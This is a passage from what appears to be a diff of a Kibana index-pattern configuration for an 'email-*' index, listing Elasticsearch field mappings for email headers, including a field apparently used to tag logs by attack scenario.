able\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171860673, 15], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,